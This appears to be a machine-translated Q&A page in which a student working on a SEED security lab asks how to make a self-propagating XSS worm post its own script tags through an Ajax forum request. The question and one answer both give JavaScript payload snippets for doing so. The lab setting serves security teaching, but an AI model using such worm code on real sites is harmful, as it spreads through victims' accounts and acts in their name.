Question

Я работаю над портированием этой лаборатории: http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS/XSS.pdf

Для проекта. Сначала, однако, я должен быть в состоянии завершить это сам. Я пытаюсь выработать самовоспроизводящегося червя, и у меня возникают некоторые трудности. Как я могу отправить тег сценария через контент? Если я попытаюсь:

var wormCode = getElementById("worm");
var escapedWorm = escape(wormCode.innerHTML);
content="topicTitle=testprop&postText=<script>"+escapedWorm+"</script>&forum=3&action=ptopic";
Ajax.send(content);

Тег выделяется из большего javascript, в котором он находится. Я также попытался разделить его на:

...+"</scr"+"ipt>&...

но это не сработало.

Какие-нибудь советы?

edit: дополнено моими более свежими (и я надеюсь, точными) попытками.

Seth Nelson · Answer 1 · 29 ноября 2011

Разделение тега конечного сценария на две разные части в конце концов сработало. Я думаю, что у меня были проблемы с браузером.

Tracker1 · Answer 2 · 29 ноября 2011

var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);

Вы не можете избежать тегов сценария.

Отправка тегов <script>в содержимом ajax

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

Ответы [ 2 ]

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Отправка тегов <script>в содержимом ajax

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

Ответы [ 2 ]

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Похожие темы